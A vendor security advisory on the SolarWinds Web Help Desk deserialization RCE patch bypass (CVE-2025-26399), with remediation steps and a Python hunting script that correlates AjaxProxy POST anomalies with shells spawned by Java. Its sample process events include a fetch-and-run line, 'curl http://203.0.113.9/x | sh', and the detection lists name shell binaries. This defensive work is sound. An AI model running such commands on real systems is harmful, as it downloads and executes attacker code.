
SolarWinds Web Help Desk (WHD) Unauthenticated RCE Patch-Bypass (CVE-2025-26399)

Filip Dimitrov

September 24, 2025

SolarWinds released Web Help Desk 12.8.7 Hotfix 1 to fix CVE-2025-26399, an unauthenticated remote code execution flaw in the AjaxProxy component caused by unsafe deserialization. This is the third fix in the same code path: CVE-2025-26399 bypasses the patch for CVE-2024-28988, which itself bypassed the patch for CVE-2024-28986, the original flaw that CISA added to its Known Exploited Vulnerabilities catalog.

No in-the-wild exploitation of CVE-2025-26399 has been reported yet, but the exploitation history of its predecessors and the number of internet-facing WHD instances make public-facing deployments high-risk and urgent to patch.

Exposure & Impact

Any WHD instance at 12.8.7 or lower is vulnerable until the hotfix JARs are installed. Exploitation requires no credentials, only network access to the WHD web interface, and yields command execution in the WHD service context: commonly SYSTEM on Windows, and on Linux whatever account the WHD service runs as.

What to Do Now

  1. Apply the hotfix (12.8.7 HF1) and restart WHD following SolarWinds’ exact JAR-replacement steps.
  2. Reduce exposure by removing public access or placing WHD behind VPN/geofencing/WAF until patched.
  3. Hunt for compromise on the WHD host, covering the window before the patch was applied: look for the Java/Tomcat process spawning shells or scripts, unexpected scheduled tasks or services, webshells under webapps/helpdesk/, and unusual POSTs to AjaxProxy endpoints with large bodies.

Detection Guidance

On the host, pivot from the WHD Java/Tomcat process and review any child cmd.exe, powershell.exe, bash, or sh activity, plus recent file writes inside WEB-INF/lib and adjacent paths. Note that the hotfix itself is a JAR replacement in that directory, so baseline any WEB-INF/lib writes against the time you installed it; writes before the hotfix, or files that are not the hotfix JARs, are the ones to investigate.

In network and web logs, search for spikes of POST requests to AjaxProxy with unusually large payloads or serialized-object markers (a Java serialization stream begins with the bytes AC ED 00 05, which appear as rO0AB when base64-encoded and as aced0005 in hex), and correlate any 500/404 anomalies on those requests with process starts on the host.
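The hunts above, worked as a script. This is an added example and not OP Innovate or SolarWinds code: it parses constructed access-log lines, flags POSTs to an AjaxProxy path that are oversized, carry a serialized-object marker, or return 500/404, flags process-start events where the Java process spawned a shell, and pairs the two by time. The log format (combined format with a trailing request-length field, since Tomcat's default access log records response bytes, not request size), the 8 KiB threshold, the 30-second correlation window, the AjaxProxy path shape and the install paths in the sample data are all assumptions; the log lines and process events are constructed, not real telemetry.

```python
import re
from datetime import datetime, timedelta

# A Java serialization stream starts with bytes AC ED 00 05. Base64-encoded
# that prefix reads "rO0AB", hex-encoded "aced0005"; either one in a logged
# URI or body preview is a serialized-object marker.
SERIALIZED_MARKERS = ("rO0AB", "aced0005")
LARGE_REQUEST_BYTES = 8 * 1024                 # assumed threshold; tune to normal WHD traffic
JAVA_PARENTS = {"java", "java.exe", "javaw.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "bash", "sh", "dash"}
CORRELATION_WINDOW = timedelta(seconds=30)     # assumed: shell spawn within 30 s of the request

# Assumed log format: combined format plus a trailing request-length field
# (nginx $request_length style). Adjust the regex to your proxy/WAF format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "[^"]*" (?P<reqlen>\d+)$'
)


def basename(image):
    """Image name without directory, for Windows or POSIX paths, lower-cased."""
    return image.replace("\\", "/").rsplit("/", 1)[-1].lower()


def parse_access_line(line):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    rec["reqlen"] = int(rec["reqlen"])
    return rec


def flag_web_requests(lines):
    """POSTs to an AjaxProxy path that are oversized, carry a serialized-object
    marker, or errored (500/404): the anomalies worth correlating with host activity."""
    hits = []
    for line in lines:
        rec = parse_access_line(line)
        if rec is None or rec["method"] != "POST" or "ajaxproxy" not in rec["path"].lower():
            continue
        reasons = []
        if rec["reqlen"] > LARGE_REQUEST_BYTES:
            reasons.append("large_request")
        if any(marker in line for marker in SERIALIZED_MARKERS):
            reasons.append("serialized_marker")
        if rec["status"] in (500, 404):
            reasons.append("status_%d" % rec["status"])
        if reasons:
            rec["reasons"] = reasons
            hits.append(rec)
    return hits


def flag_shell_children(events):
    """Process-start events where a Java process (the WHD service) spawned a shell."""
    return [e for e in events
            if basename(e["parent"]) in JAVA_PARENTS and basename(e["image"]) in SHELLS]


def correlate(web_hits, proc_hits, window=CORRELATION_WINDOW):
    """Pair each flagged request with shell spawns starting within `window` after it."""
    pairs = []
    for w in web_hits:
        for p in proc_hits:
            delta = datetime.fromisoformat(p["ts"]) - w["ts"]
            if timedelta(0) <= delta <= window:
                pairs.append((w["path"], w["reasons"], p["cmdline"], int(delta.total_seconds())))
    return pairs


# Constructed sample data, not real logs; the AjaxProxy path shape and the
# install paths are assumptions.
ACCESS_LOG = [
    '10.0.0.5 - - [24/Sep/2025:10:15:30 +0000] "GET /helpdesk/WebObjects/Helpdesk.woa HTTP/1.1" 200 5120 "-" "Mozilla/5.0" 612',
    '10.0.0.5 - - [24/Sep/2025:10:15:31 +0000] "POST /helpdesk/AjaxProxy HTTP/1.1" 200 210 "-" "Mozilla/5.0" 1450',
    '203.0.113.9 - - [24/Sep/2025:10:15:32 +0000] "POST /helpdesk/AjaxProxy HTTP/1.1" 500 0 "-" "python-requests/2.32" 41233',
    '203.0.113.9 - - [24/Sep/2025:10:16:05 +0000] "POST /helpdesk/AjaxProxy?data=rO0ABXNyAA HTTP/1.1" 200 0 "-" "curl/8.5.0" 2048',
]
PROCESS_EVENTS = [
    {"ts": "2025-09-24T10:15:33+00:00", "parent": r"C:\Program Files\WebHelpDesk\jre\bin\java.exe",
     "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe /c whoami"},
    {"ts": "2025-09-24T10:15:40+00:00", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe"},
    {"ts": "2025-09-24T10:16:07+00:00", "parent": "/opt/whd/jre/bin/java",
     "image": "/bin/sh", "cmdline": "sh -c 'curl http://203.0.113.9/x | sh'"},
]

if __name__ == "__main__":
    web = flag_web_requests(ACCESS_LOG)
    proc = flag_shell_children(PROCESS_EVENTS)
    for path, reasons, cmdline, secs in correlate(web, proc):
        print(f"{path} {reasons} -> {cmdline!r} {secs}s later")
```

The legitimate small POST to AjaxProxy is left alone, the two anomalous requests each pair with the shell that started seconds later, and the explorer.exe-spawned cmd.exe is ignored because its parent is not the Java process. Feed it your proxy log and EDR process exports in the same shapes and the pairs are your triage list.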

Why It Matters

Two bypasses in about a year indicate attackers are diffing the patches and iterating on the same deserialization sink. Admin-adjacent tools like WHD often sit in sensitive network segments and hold ticket data and internal contacts; if compromised, they provide convenient staging points for lateral movement.

OP Innovate Recommendations

Prioritize internet-reachable WHD for immediate remediation, then internal-only instances in the next change window. Add the simple host and network hunts above to your SIEM/EDR. 

If you need help validating the patch or checking for signs of compromise, our IR & PTaaS teams can assist with verification scans and hardening.

Stay Safe. Stay Secure.

OP Innovate Research Team
